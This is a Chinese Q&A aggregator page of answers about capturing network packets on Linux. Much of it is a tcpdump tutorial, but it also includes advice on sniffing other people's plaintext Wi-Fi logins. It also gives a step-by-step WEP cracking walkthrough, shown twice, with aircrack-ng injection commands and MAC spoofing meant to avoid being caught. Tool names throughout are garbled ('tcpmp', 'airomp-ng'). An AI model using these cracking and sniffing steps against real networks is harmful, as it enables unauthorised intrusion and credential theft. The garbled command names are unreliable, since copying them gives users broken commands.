當前位置:首頁 » 操作系統 » 抓包linux命令

抓包linux命令

發布時間: 2022-05-06 14:16:51

linux抓包如何分包

方法如下。
tcpmp 是Linux系統下的一個強大的命令,可以將網路中傳送的數據包完全截獲下來提供分析。它支持針對網路層、協議、主機、網路或埠的過濾,並提供and、or、not等邏輯語句來幫助你去掉無用的信息。
本教程對tcpmp命令使用進行講解說明,通過本教程您可以學會linux系統下使用tcpmp命令進行網路抓包,實現對數據包進行捕獲分析。
tcpmp 命令格式介紹
首先我們對Linux系統下tcpmp命令格式進行一個介紹說明,在下面的使用教程中講到tcpmp命令示例時,您就可以參考tcpmp命令參數說明進行學習。
該命令示例在CentOS release 6.10 (Final) 中tcpmp演示
語法:
tcpmp [ -AdDefIJKlLnNOpqRStuUvxX ] [ -B buffer_size ] [ -c count ]
[ -C file_size ] [ -G rotate_seconds ] [ -F file ]
[ -i interface ] [ -j tstamp_type ] [ -m mole ] [ -M secret ]
[ -Q|-P in|out|inout ]
[ -r file ] [ -s snaplen ] [ -T type ] [ -w file ]
[ -W filecount ]
[ -E spi@ipaddr algo:secret,... ]
[ -y datalinktype ] [ -z postrotate-command ] [ -Z user ]
[ expression ]
命令行參數介紹:
-A 以ASCII格式列印出所有分組,並將鏈路層的頭最小化。
-c 在收到指定的數量的分組後,tcpmp就會停止。
-C 在將一個原始分組寫入文件之前,檢查文件當前的大小是否超過了參數file_size
中指定的大小。如果超過了指定大小,則關閉當前文件,然後在打開一個新的文件。參數 file_size
的單位是兆位元組(是1,000,000位元組,而不是1,048,576位元組)。
-d 將匹配信息包的代碼以人們能夠理解的匯編格式給出。
-dd 將匹配信息包的代碼以c語言程序段的格式給出。
-ddd 將匹配信息包的代碼以十進制的形式給出。
-D 列印出系統中所有可以用tcpmp截包的網路介面。
-e 在輸出行列印出數據鏈路層的頭部信息。
-E 用spi@ipaddr algo:secret解密那些以addr作為地址,並且包含了安全參數索引值spi的IPsec ESP分組。
-f 將外部的Internet地址以數字的形式列印出來。
-F 從指定的文件中讀取表達式,忽略命令行中給出的表達式。
-i 指定監聽的網路介面。
-l 使標准輸出變為緩沖行形式。
-L 列出網路介面的已知數據鏈路。
-m 從文件mole中導入SMI MIB模塊定義。該參數可以被使用多次,以導入多個MIB模塊。
-M 如果tcp報文中存在TCP-MD5選項,則需要用secret作為共享的驗證碼用於驗證TCP-MD5選選項摘要(詳情可參考RFC 2385)。
-n 不把網路地址轉換成名字。
-N 不輸出主機名中的域名部分。例如,link.linux265.com 只輸出link。
-t 在輸出的每一行不列印時間戳。
-O 不運行分組分組匹配(packet-matching)代碼優化程序。
-P 不將網路介面設置成混雜模式。
-q 快速輸出。只輸出較少的協議信息。
-r 從指定的文件中讀取包(這些包一般通過-w選項產生)。
-S 將tcp的序列號以絕對值形式輸出,而不是相對值。
-s 從每個分組中讀取最開始的snaplen個位元組,而不是默認的68個位元組。
-T 將監聽到的包直接解釋為指定的類型的報文,常見的類型有rpc遠程過程調用)和snmp(簡單網路管理協議;)。
-t 不在每一行中輸出時間戳。
-tt 在每一行中輸出非格式化的時間戳。
-ttt 輸出本行和前面一行之間的時間差。
-tttt 在每一行中輸出由date處理的默認格式的時間戳。
-u 輸出未解碼的NFS句柄。
-v 輸出一個稍微詳細的信息,例如在ip包中可以包括ttl和服務類型的信息。
-vv 輸出詳細的報文信息。
-w 直接將分組寫入文件中,而不是不分析並列印出來。
-x 以16進制數形式顯示每一個報文 (去掉鏈路層報頭) . 可以顯示較小的完整報文, 否則只顯示snaplen個位元組.
-xx 以16進制數形式顯示每一個報文(包含鏈路層包頭)。
-X 以16進制和ASCII碼形式顯示每個報文(去掉鏈路層報頭)。
-XX 以16進制和ASCII嗎形式顯示每個報文(包含鏈路層報頭)。
-y 設置tcpmp 捕獲數據鏈路層協議類型
-Z 使tcpmp 放棄自己的超級許可權(如果以root用戶啟動tcpmp, tcpmp將會有超級用戶許可權), 並把當前tcpmp的用戶ID設置為user, 組ID設置為user首要所屬組的ID
tcpmp 命令使用示例
linux系統下執行tcpmp命令需要root賬號或者具備sudo許可權的賬號,否則執行tcpmp命令說,系統會提示tcpmp: no suitable device found。
在下面的例子中,-i eth0 參數表示只抓取 eth0 介面數據包,不加-i eth0 是表示抓取所有的介麵包括 lo。
01、抓取所有網路包,並在terminal中顯示抓取的結果,將包以十六進制的形式顯示。
tcpmp
02、抓取所有的網路包,並存到 result.cap 文件中。
tcpmp -w result.cap
03、抓取所有的經過eth0網卡的網路包,並存到result.cap 文件中。
tcpmp -i eth0 -w result.cap
04、抓取源地址是192.168.1.100的包,並將結果保存到 result.cap 文件中。
tcpmp src host 192.168.1.100 -w result.cap
05、抓取地址包含是192.168.1.100的包,並將結果保存到 result.cap 文件中。
tcpmp host 192.168.1.100 -w result.cap
06、抓取目的地址包含是192.168.1.100的包,並將結果保存到 result.cap 文件中。
tcpmp dest host 192.168.1.100 -w result.cap
07、抓取主機地址為 192.168.1.100 的數據包
tcpmp -i eth0 -vnn host 192.168.1.100
08、抓取包含192.168.1.0/24網段的數據包
tcpmp -i eth0 -vnn net 192.168.1.0/24
09、抓取網卡eth0上所有包含埠22的數據包
tcpmp -i eth0 -vnn port 22
10、抓取指定協議格式的數據包,協議格式可以是「udp,icmp,arp,ip」中的任何一種,例如以下命令:
tcpmp udp -i eth0 -vnn
11、抓取經過 eth0 網卡的源 ip 是 192.168.1.100 數據包,src參數表示源。
tcpmp -i eth0 -vnn src host 192.168.1.100
12、抓取經過 eth0 網卡目的 ip 是 192.168.1.100 數據包,dst參數表示目的。
tcpmp -i eth0 -vnn dst host 192.168.1.100
13、抓取源埠是22的數據包
tcpmp -i eth0 -vnn src port 22
14、抓取源ip是 192.168.1.100 且目的ip埠是22的數據包
tcpmp -i eth0 -vnn src host 192.168.1.100 and dst port 22
15、抓取源ip``192.168.1.100``22
tcpmp -i eth0 -vnn src host 192.168.1.100 or port 22
16、抓取源ip``192.168.1.100``22
tcpmp -i eth0 -vnn src host 192.168.1.100 and not port 22
17、抓取源ip是192.168.1.100且目的埠是22,或源ip是192.168.1.102且目的埠是80的數據包。
tcpmp -i eth0 -vnn ( src host 192.168.1.100 and dst port 22 ) or ( src host 192.168.1.102 and dst port 80 )
18、把抓取的數據包記錄存到/tmp/result文件中,當抓取100個數據包後就退出程序。
tcpmp _i eth0 -vnn -w /tmp/result -c 100
19、從/tmp/result記錄中讀取tcp協議的數據包
tcpmp -i eth0 tcp -vnn -r /tmp/result
20、想要截獲所有192.168.1.100的主機收到的和發出的所有的數據包:
tcpmp host 192.168.1.100
21、如果想要獲取主機192.168.1.100除了和主機192.168.1.101之外所有主機通信的ip包,使用命令:
tcpmp ip host 192.168.1.100 and ! 192.168.1.101
22、如果想要獲取主機 192.168.1.100 接收或發出的 telnet 包,使用如下命令:
tcpmp tcp port 23 host 192.168.1.100

⑵ linux嗅探 抓包

在linux上輸入命令
tcpmp -nn -A -i eth0 not port 22 -w linux.pcap
就可以抓包了,並且包的內容如果包含wifi賬號和密碼,也就在裡面了
參數說明:
-nn IP和埠都不解析,直接顯示數字
-A 以ASCII顯示數據包內容
-X 以hex(十六進制)和ASCII顯示內容
-q 僅簡短,精簡內容
-w 寫入某個文件
-r 讀取-w寫入的文件內容
但是還要滿足以下條件:
1.人家wifi上網是通過你這台linux的,
2.你抓包的時候人家正在登陸wifi,而不是已經成功登陸過wifi了,或一直沒有登陸wifi,
3.密碼是明文的,而不是加密的。
那抓的包裡面就可以看到wifi賬號和密碼了。
另外,有基於linux系統的去破解wifi的,這個是基於暴力破解,跟抓包又不一樣了。

⑶ 如何在linux下安裝抓包工具

安裝上tcpmp,就可以用這個抓包了,具體使用 tcpmp -vvv -nn -port 80 -w /tmp/file,你也可以用man tcpmp 查看此命令的具體使用

⑷ linux下怎麼抓包

tcpmp,就可以用這個抓包了,具體使用 tcpmp -vvv -nn -port 80 -w /tmp/file,你也可以用man tcpmp 查看此命令的具體使用

⑸ linux網路數據抓包工具有哪些 lpcat\

linux下有命令可直接執行抓包的,命令如下:
1、tcpmp -vv -i ethN -s 10240 -w /root/abc.cap host ip
2、上述命令中,ethN,是你要抓的本機網卡,一般是eth0,可使用ifconfig查看使用的哪個網卡
-s 指定的是抓包數量 -w指定的是抓到的包寫到哪個位置 host ip即為抓取哪個ip 的包

⑹ linux怎麼開啟抓包tcp 53

Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始終不能在win下抓包,所以只能 棄 Windows 從Linux 了,另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實 Windows 並不完整的支持 TCP/IP 協議族,有些協議Windows 直接丟棄不用。網路本來從一開始就是 Unix 的天下,Windows 只是在後來加入了網路的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下幾個: airmon-ng 處理網卡工作模式 airomp-ng 抓包 aircrack-ng 破解 aireplay-ng 發包,干擾 另外還要用到以下 linux 命令: ifconfig 查看修改網卡狀態和參數 macchanger 偽造 MAC iwconfig 主要針對無線網卡的工具 (同 ifconfig) iwlist 獲取無線網路的更詳細信息 另外還有其他的 linux 基本命令,我就不提示了。 具體破解步驟: 1. 修改無線網卡狀態:先 dow 2. 偽造無線網卡的 MAC 地址:安全起見,減少被抓到的可能 3. 修改網卡工作模式:進入Monitor狀態,會產生一個虛擬的網卡 4. 修改無線網卡狀態: up 5. 查看網路狀態,記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標 6. 監聽抓包:生成 .cap 或 .ivs 7. 干擾無線網路:截取無線數據包,發送垃圾數據包,用來獲得更多的有效數據包 8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解 Crack Mode一共有5種請酌情使用還有網卡不一定是ath1也有可能是wifi0,ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airomp-ng --ivs -w 目標路由器IVS文件 -c 6 ath1 airomp-ng ath1 aireplay-ng -1 0 -e 目標路由器SSID -a 目標MAC -h 本機MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標MAC -h 本機MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目標MAC -h 本機MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目標MAC -h 本機MAC ath1 packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目標MAC -h 本機MAC ath1 packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目標MAC 目標路由器IVS文件-01.ivs —————————————————————————————— 下面詳細介紹一下各個命令的基本用法(參照命令的英文說明) 1. ifconfig 用來配置網卡,我們這里主要用來 禁用和啟用 網卡: ifconfig ath0 down ifconfig ath0 up 禁用一下網卡的目的是為了下一步修改 MAC 。 2.macchanger 用來改變網卡的 MAC 地址,具體用法如下: usage: macchanger [options] device -h 顯示幫助 -V 顯示版本 -s 顯示當前MAC -e 不改變mac,使用硬體廠商寫入的MAC -a 自動生成一個同類型的MAC,同廠商的 -A 自動生成一個不同類型的MAC,不同廠商的 -r 生成任意MAC -l 顯示已知廠商的網卡MAC地址分配,這個很有用,可以根據MAC查出來是哪個廠商生產的產品 -m 設置一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 啟動無線網卡進入 Monitor 模式, useage: airmon-ng <startstopcheck> <interface> [channel] <startstopcheck>啟動,停止,檢測 <interface>指定無線網卡 [channel] 監聽頻道,現代大多數無線路由默認是 6,隨便掃描一下都是這個頻道,網管們應該換換了 4.iwconfig 專用的無線網卡配置工具,用來配置特殊的網路信息,不帶參數時顯示可用網路。 useage:iwconfig interface [options] [essid{NNONOFF}] 指定essid號 開啟關閉 [nwid{NNonoff}] 指定網路id號 開啟關閉 [mode {managedad-hoc....}] 指定無線網路工作模式/類型 [freq N.NNNN[KMG]] 指定工作頻率 [channel N] 指定頻道 [ap {Noffauto}] 指定AP號 關閉/自動 [sens N] sens 號 [nick N] nick 號 [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制,如果不知道什麼是RTS,那就回去好好去學網路,不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范圍 [power {period Ntimeout N}] 電源 頻率/超時 [retry {limit Nlifetime N}] 重試 限次/超時 [txpower N{mwdBm}] 功率 毫瓦/分貝 [commit] 處理 5.iwlist 主要用來顯示無線網卡的一些附加信息,同上 useage: iwlist [interface] options scanning 掃描 frequency 頻率 channel 頻道 bitrate 速率 rate 速率 encryption 加密 key 密鑰 power 電源 txpower 功率 ap ap accespoints ap peers 直連 event 事件 6.airomp-ng 抓包工具,我最喜歡用的,詳細用法如下: usage: airomp-ng <options> <interface>[,<interface>,...] Options: --ivs :僅將抓取信息保存為 .ivs --gpsd :使用 GPSd --write <prefix> :保存為指定日文件名,我一般用這個,尤其是多個網路時,指定了也好區分 -w :同 --write --beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數據包的 --update <secs> :顯示更新延遲,沒有用過 --showack :顯示ack/cts/rts狀態,還是那句,不知道rts就不用看了 -h :隱藏已知的,配合上面的選項使用 -f <msecs> :跳頻時間 --berlin <secs> :無數據包接收時延遲顯示的時間,這句不太好翻譯,意思是當那個信號發出設備沒有發出數據包多少時間之後,就停止對它的監視.默認120秒.建議學好英文去讀原文,翻譯的都會有出入,這是我的理解.(mhy_mhy注) -r <file> :從指定的文件讀取數據包.我也想有人給我抓好包放哪裡,呵呵 Filter options: --encrypt <suite> : 使用密碼序列過濾 AP --netmask <netmask> : 使用掩碼過濾 AP --bssid <bssid> : 使用 bssid 過濾 AP -a : 過濾無關的客戶端 默認情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作: --channel <channels>:指定頻道 --band <abg> :制定帶寬 -C <frequencies> :指定頻率MHz --cswitch <method> : 設置頻道交換方式 0 : FIFO (default) 先進先出(默認) 1 : Round Robin 循環 2 : Hop on last 最後一跳 -s : 同上 --help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文 7.aireplay-ng

⑺ linux如何抓包

樓主,下個wireshark就可以了。在控制台root許可權下就可以運行,還是有圖形界面的,抓起來很方便

⑻ linux怎麼抓包,怎麼查看分析

linux上面有命令界面的tcpmp,wireshark,圖形界面的wireshark都可以抓包。想要了解更多關於Linux的資訊和文章請關注《linux就該這么學》。

⑼ airomp-ng linux下怎樣抓包

Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始終不能在win下抓包,所以只能 棄 Windows 從Linux 了,另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實 Windows 並不完整的支持 TCP/IP 協議族,有些協議Windows 直接丟棄不用。網路本來從一開始就是 Unix 的天下,Windows 只是在後來加入了網路的功能。
Aircrack-ng工具包有很多工具,我用到的工具主要有以下幾個:
airmon-ng 處理網卡工作模式
airomp-ng 抓包
aircrack-ng 破解
aireplay-ng 發包,干擾
另外還要用到以下 linux 命令:
ifconfig 查看修改網卡狀態和參數
macchanger 偽造 MAC
iwconfig 主要針對無線網卡的工具 (同 ifconfig)
iwlist 獲取無線網路的更詳細信息
另外還有其他的 linux 基本命令,我就不提示了。
具體破解步驟:
1. 修改無線網卡狀態:先 dow
2. 偽造無線網卡的 MAC 地址:安全起見,減少被抓到的可能
3. 修改網卡工作模式:進入Monitor狀態,會產生一個虛擬的網卡
4. 修改無線網卡狀態: up
5. 查看網路狀態,記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標
6. 監聽抓包:生成 .cap 或 .ivs
7. 干擾無線網路:截取無線數據包,發送垃圾數據包,用來獲得更多的有效數據包
8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解

Crack Mode一共有5種請酌情使用還有網卡不一定是ath1也有可能是wifi0,ath0等等
ifconfig -a
ifconfig -a ath0 up
airmon-ng start wifi0 6
airomp-ng --ivs -w 目標路由器IVS文件 -c 6 ath1
airomp-ng ath1
aireplay-ng -1 0 -e 目標路由器SSID -a 目標MAC -h 本機MAC ath1
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標MAC -h 本機MAC ath1
----------- -3 Crack Mode-----------
aireplay-ng -3 -b 目標MAC -h 本機MAC ath1
----------- -4 Crack Mode-----------
aireplay-ng -4 -b 目標MAC -h 本機MAC ath1
packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- -5 Crack Mode-----------
aireplay-ng -5 -b 目標MAC -h 本機MAC ath1
packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
-----------Crack Key-----------
aircrack-ng -n 64 -b 目標MAC 目標路由器IVS文件-01.ivs
——————————————————————————————
下面詳細介紹一下各個命令的基本用法(參照命令的英文說明)
1. ifconfig
用來配置網卡,我們這里主要用來 禁用和啟用 網卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下網卡的目的是為了下一步修改 MAC 。
2.macchanger
用來改變網卡的 MAC 地址,具體用法如下:
usage: macchanger [options] device
-h 顯示幫助
-V 顯示版本
-s 顯示當前MAC
-e 不改變mac,使用硬體廠商寫入的MAC
-a 自動生成一個同類型的MAC,同廠商的
-A 自動生成一個不同類型的MAC,不同廠商的
-r 生成任意MAC
-l 顯示已知廠商的網卡MAC地址分配,這個很有用,可以根據MAC查出來是哪個廠商生產的產品
-m 設置一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。
3.airmon-ng
啟動無線網卡進入 Monitor 模式,
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check>啟動,停止,檢測
<interface>指定無線網卡
[channel] 監聽頻道,現代大多數無線路由默認是 6,隨便掃描一下都是這個頻道,網管們應該換換了
4.iwconfig
專用的無線網卡配置工具,用來配置特殊的網路信息,不帶參數時顯示可用網路。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid號 開啟關閉
[nwid{NN|on|off}] 指定網路id號 開啟關閉
[mode {managed|ad-hoc|....}] 指定無線網路工作模式/類型
[freq N.NNNN[K|M|G]] 指定工作頻率
[channel N] 指定頻道
[ap {N|off|auto}] 指定AP號 關閉/自動
[sens N] sens 號
[nick N] nick 號
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什麼是RTS,那就回去好好去學網路,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范圍
[power {period N|timeout N}] 電源 頻率/超時
[retry {limit N|lifetime N}] 重試 限次/超時
[txpower N{mw|dBm}] 功率 毫瓦/分貝
[commit] 處理
5.iwlist
主要用來顯示無線網卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 掃描
frequency 頻率
channel 頻道
bitrate 速率
rate 速率
encryption 加密
key 密鑰
power 電源
txpower 功率
ap ap
accespoints ap
peers 直連
event 事件
6.airomp-ng
抓包工具,我最喜歡用的,詳細用法如下:
usage: airomp-ng <options> <interface>[,<interface>,...]
Options:
--ivs :僅將抓取信息保存為 .ivs
--gpsd :使用 GPSd
--write <prefix> :保存為指定日文件名,我一般用這個,尤其是多個網路時,指定了也好區分
-w :同 --write
--beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數據包的
--update <secs> :顯示更新延遲,沒有用過
--showack :顯示ack/cts/rts狀態,還是那句,不知道rts就不用看了
-h :隱藏已知的,配合上面的選項使用
-f <msecs> :跳頻時間
--berlin <secs> :無數據包接收時延遲顯示的時間,這句不太好翻譯,意思是當那個信號發出設備沒有發出數據包多少時間之後,就停止對它的監視.默認120秒.建議學好英文去讀原文,翻譯的都會有出入,這是我的理解.(mhy_mhy注)
-r <file> :從指定的文件讀取數據包.我也想有人給我抓好包放哪裡,呵呵
Filter options:
--encrypt <suite> : 使用密碼序列過濾 AP
--netmask <netmask> : 使用掩碼過濾 AP
--bssid <bssid> : 使用 bssid 過濾 AP
-a : 過濾無關的客戶端
默認情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作:
--channel <channels>:指定頻道
--band <abg> :制定帶寬
-C <frequencies> :指定頻率MHz
--cswitch <method> : 設置頻道交換方式
0 : FIFO (default) 先進先出(默認)
1 : Round Robin 循環
2 : Hop on last 最後一跳
-s : 同上
--help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文
7.aireplay-ng

熱點內容
工業級安卓主板價格怎麼樣 發布:2024-10-07 14:07:57 瀏覽:625
編程先乘除 發布:2024-10-07 13:58:45 瀏覽:268
編譯內核時發生循環編譯 發布:2024-10-07 13:58:43 瀏覽:494
當下筆記本電腦什麼配置好 發布:2024-10-07 12:57:33 瀏覽:468
安卓倒車軌跡怎麼調 發布:2024-10-07 12:54:47 瀏覽:913
問道刷道隊伍怎麼配置 發布:2024-10-07 12:09:17 瀏覽:323
androidservice使用 發布:2024-10-07 12:00:01 瀏覽:261
樂視2安卓版本怎麼升級 發布:2024-10-07 11:51:11 瀏覽:696
方舟電腦版怎麼進入官方伺服器 發布:2024-10-07 11:09:32 瀏覽:807
百度雲快速上傳 發布:2024-10-07 10:52:25 瀏覽:482